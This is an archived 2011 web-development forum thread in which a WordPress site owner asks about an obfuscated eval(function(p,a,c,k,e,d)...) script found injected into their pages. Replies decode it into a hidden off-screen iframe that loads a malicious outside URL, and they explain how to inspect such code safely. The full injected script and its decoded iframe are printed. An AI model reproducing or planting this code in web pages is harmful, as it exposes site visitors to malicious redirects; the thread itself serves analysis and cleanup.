...

View Full Version : What does this code mean? Involves a function(p,a,c,k,e,d)



afa
12-15-2011, 08:03 AM
So I like to think I'm pretty decent with web programming, but this code has me puzzled.
<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i<l;i+=2){7[j++]=c[5.A(i,2)]}o 7.z(\'\')}6(8.m.C(\'p=d\')==-1){8.B(n(\'D\'));8.m=\'p=d\'}',40,40,'|||var||data|if|result|document|||b16_digits|b16_map|enabled|A rray|charAt|length|new|||for|ll|cookie|hDcd|return|cookien|fromCharCode|function|match|String|15|f0| 0123456789abcdef|256|false|join|substr|write|indexOf|3c646976207374796c653d22706f736974696f6e3a20616 2736f6c7574653b206c6566743a202d3139393370783b20746f703a202d3239393470783b223e3c696672616d65207769647 4683d22343022206865696768743d22333022207372633d22687474703a2f2f3167323166736e32747062642e63652e6d732 f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e'.split('|'),0,{}))</script>I know it's evil code, I had to put it through a base 64 decode twice to get to this. But all that I'm really after is this: Is there any lingering harm on the website which had this live code? When one tries to create a link to the site (powered by WordPress, by the way) on Facebook, there is this error message:
Cannot modify header information - headers already sent by (output started at /home/content/xx/xxxxxxx/html/index.php(1) : eval()'d code:37) in /home/content/xx/xxxxxxx/html/wp-includes/pluggable.php on line 897Even though I've taken the code out from index.php and then functions.php after I spotted it there. Why is this error on FB still happening if this code cannot be found in the text files? Could there be something evil happening in the database?

Any assistance would be most appreciated.

Philip M
12-15-2011, 08:19 AM
http://www.codeproject.com/KB/scripting/Dean_Edwards_Decoder.aspx

If you replace the opening eval( with document.write( ... all the code is dumped to the screen. If some of it is being interpereted as html rather than being displayed consider forcing your document.write to write between <textarea></textarea> tags.


All advice is supplied packaged by intellectual weight, and not by volume. Contents may settle slightly in transit.

Old Pedant
12-15-2011, 08:56 AM
The main point of this seems to be to try to get you to bite on some supposedly free offers.

The big long string of hex numbers turns out to be this:


<div style="position: absolute; left: -1993px; top: -2994px;">
<iframe width="40" height="30" src="http://1g21fsn2tpbd.ce.ms/i.php?go=1">
</iframe>
</div>

As you can see, that creates a <div> on your page that is way off the top left edge and so is effectively invisible.

In the <div> it drops in an <iframe> with the "poison" URL. That URL immediately takes over the entire window (that is, it loads its own content into the _top window, replacing whatever was there) and starts trying to bombard you with offers.

Not being foolish enough to click through to some of the offers, I can't guess what else they try to do. My guess would be that they try to get you to download something that will install itself as a virus or spyware on your machine. You are welcome to find out for yourself.

Old Pedant
12-15-2011, 08:57 AM
The weird part of this is that the hex string there isn't even mildly encrypted. It's almost like they want people to break this open. Every other one like this I've seen, the hex values are at least encrypted with a simple substitution cipher. This one doesn't bother.

Philip M
12-15-2011, 09:04 AM
The main point of this seems to be to try to get you to bite on some supposedly free offers.


The cheese in the mousetrap is always free! :D:D

Old Pedant
12-15-2011, 09:05 AM
By the by, Philip, if you *do* document.write that to the screen, it *will* drop the <div> and <iframe> in place and kablooey, you are in their hands. I seriously recommend that if you do stuff like this you inspect each character before document.write'ing it and, if it is "<", replace it with "&lt;". Which is what I did.

Philip M
12-15-2011, 09:11 AM
By the by, Philip, if you *do* document.write that to the screen, it *will* drop the <div> and <iframe> in place and kablooey, you are in their hands. I seriously recommend that if you do stuff like this you inspect each character before document.write'ing it and, if it is "<", replace it with "&lt;". Which is what I did.

Yes, I should have mentioned that!

afa
12-16-2011, 05:39 AM
Thanks, Philip and Old Pedant! I had read that it was possible new pages had been added to the site if such code is implemented, but if that div is the result of the script, then perhaps not? I do wonder why I still have that FB message though with the above being removed several days ago.

Old Pedant
12-16-2011, 06:10 AM
I don't see how it could *truly* add a new page to the site, as that would mean storing something on your server. And if you have done even a halfway decent job of locking down your server's directory, that shouldn't happen.

What it *could* do is give the *appearance* of new pages. For example, it could locate a menu and tack on another menu item. That menu item's onclick would then be implemented via the code I showed that brings up a foreign site's window just as if it's part of your site.

So maybe that's what it's referring to.

But as to "that FB message"... I admit it does look like they seem to have figured a way to try to stick something in your page headers. The message results because, indeed, if you try to modify an HTML header and *ANY* if HTML tags (even the <html> tag itself) have already been sent to the browser, then you can't do so. So it sounds like their attemped hack isn't happening, but you are seeing the vestiges of it in the form of that message.

felgall
12-16-2011, 08:54 PM
The p,a,c,k,e,d function is generated by an early JavaScript compressor written by one of the top JavaScript experts. It was used quite often by major scripts up until a few years ago to make the script to be downloaded a lot smaller. Older versions of JQuery used to use it.

In the last few years more and more people have support for HTTP 1.1 enabled and so that can be used to compress all files. This means that a minified version of a script compressed with HTTP 1.1 ends up being a smaller download than the p,a,c,k,e,d version without the need to have the JavaScript decompress itself in the browser. This effectively made p,a,c,k,e,d obsolete. Of course some people still use it simply because it conceals the code making it slightly harder to read.



EZ Archive Ads Plugin for vBulletin Copyright 2006 Computer Help Forum